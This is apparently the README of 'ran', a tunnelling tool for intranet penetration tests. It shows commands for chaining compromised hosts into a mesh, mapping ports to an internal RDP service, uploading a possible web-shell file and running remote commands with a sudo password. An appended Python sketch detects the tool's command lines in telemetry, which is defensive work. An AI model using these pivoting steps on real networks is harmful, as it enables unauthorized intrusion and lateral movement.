Cloud native mesh networking, now introduced to intranet pentests.
Pre-compiled binaries can be found on GitHub Releases.
For users in mainland China, please use the Coding.net mirror.
- Download `go>=1.18`,
- Clone this repository and `make` to build the binaries from source.
Learn the usage through an example.
Assuming:
- you are using `192.168.137.1/24`,
- you have taken down `192.168.137.101/24`, `192.168.137.101/24` also has address `192.168.56.101/24`,
- you have taken down `192.168.56.102/24` too, `192.168.56.102` also has address `10.103.10.102/24`.
- now you want to break into `10.103.10.0/24` through `192.168.56.102/24`
Set up the mesh network on the entrypoint:

```bash
# Exec on 192.168.137.101
./ran -l "rantp://0.0.0.0:10080"
```
Connect an individual endpoint to the mesh network:

```bash
# Exec on 192.168.137.102
./ran -u "rantp://192.168.137.101:10080"
```
Or ALTERNATIVELY, connect from the entrypoint to that individual endpoint:

```
# Exec on 192.168.137.102
./ran -l "rantp://0.0.0.0:10080"
# Exec in the interactive shell later. druB is the node name of `101`.
probenode durB 192.168.137.102:10080
```
Access the mesh endpoint, interactively:

```bash
# Exec on 192.168.137.1
./ran -u "rantp://192.168.137.101:10080" -i
# Exec query without being interactive
./ran -u "rantp://192.168.137.101:10080" -c "listnodes"
```
Show nodes on the mesh network:

```
listnodes
```
Create tunnel mapping:

```
# Aagd is the node name of `192.168.56.102`
addmapping zero:192.168.137.1:4321 Aagd:10.103.10.34:3389
# if the ip address is 0.0.0.0 or the same as the node ip,
# or the `--listen` flag is specified, the mapping will be reversed
addmapping zero:192.168.137.1:10050 Aagd:10.103.10.102:10050
addmapping zero:192.168.137.1:10050 Aagd::10050 --listen
```
Upload and exec command on remote node:

```
# get node information
info Aagd
# Upload or download files with syncfile
syncfile /tmp/ma.php Aagd:/tmp/ma.php
# Executes in a non-login shell with the environment loaded, as user "arthur"
execute "whoami" --sudo "arthur" --password "123456"
```
Use `[fe80::wtf]` if you want to conquer over IPv6.
By default, ran uses ranTP as the protocol for the control plane, and direct L4 routing for the data plane.
Alternatively, you can use HTTP to wrap the control plane, the data plane, or both.
SOCKS5, HTTP/2, HTTPS, QUIC, DNS, and WS+TLS will be supported in the future.
This framework may be robust enough to serve as an L4 service mesh in the future.
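
Every node and operator command above passes a `rantp://host:port` URI to `-l` or `-u`, so that argument identifies the tool in process-creation telemetry even when the binary has been renamed. The following is an added example, not code from the ran project: a detection sketch over command lines, where the event tuples, hostnames and role labels are assumptions constructed for illustration.

```python
import re
import shlex

# Matches the URI form used in the README's commands; host may be a bracketed IPv6 literal.
RANTP_URI = re.compile(r"^rantp://(\[[^\]]+\]|[^:/\s]+):(\d{1,5})$", re.IGNORECASE)

def classify(cmdline):
    """Return a finding dict if cmdline passes a rantp:// URI to -l or -u, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes in a truncated log field
        argv = cmdline.replace('"', "").split()
    for flag, value in zip(argv, argv[1:]):
        m = RANTP_URI.match(value) if flag in ("-l", "-u") else None
        if not m:
            continue
        if flag == "-l":
            role = "listener"
        elif "-i" in argv or "-c" in argv:
            role = "operator"     # interactive shell or one-shot query
        else:
            role = "node"
        return {"role": role, "host": m.group(1), "port": int(m.group(2))}
    return None

# Constructed process-creation records (hostname, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("srv-a", './ran -l "rantp://0.0.0.0:10080"'),
    ("srv-b", '/tmp/.cache/upd -u "rantp://192.168.137.101:10080"'),   # renamed binary
    ("wks-1", './ran -u "rantp://192.168.137.101:10080" -c "listnodes"'),
    ("wks-2", 'curl -u user:pass http://intranet.example/status'),     # benign -u
    ("srv-c", 'ran -l "rantp://[fe80::1]:10080'),                      # truncated quote
]

def scan(events):
    """Yield (hostname, finding) for every event that classify() flags."""
    for host, cmdline in events:
        finding = classify(cmdline)
        if finding:
            yield host, finding

if __name__ == "__main__":
    for host, f in scan(SAMPLE_EVENTS):
        print(f"{host}: ran {f['role']} -> {f['host']}:{f['port']}")
```

This only covers the default ranTP URIs; the HTTP-wrapped mode mentioned above would need a different signal, since its command-line form is not shown on this page.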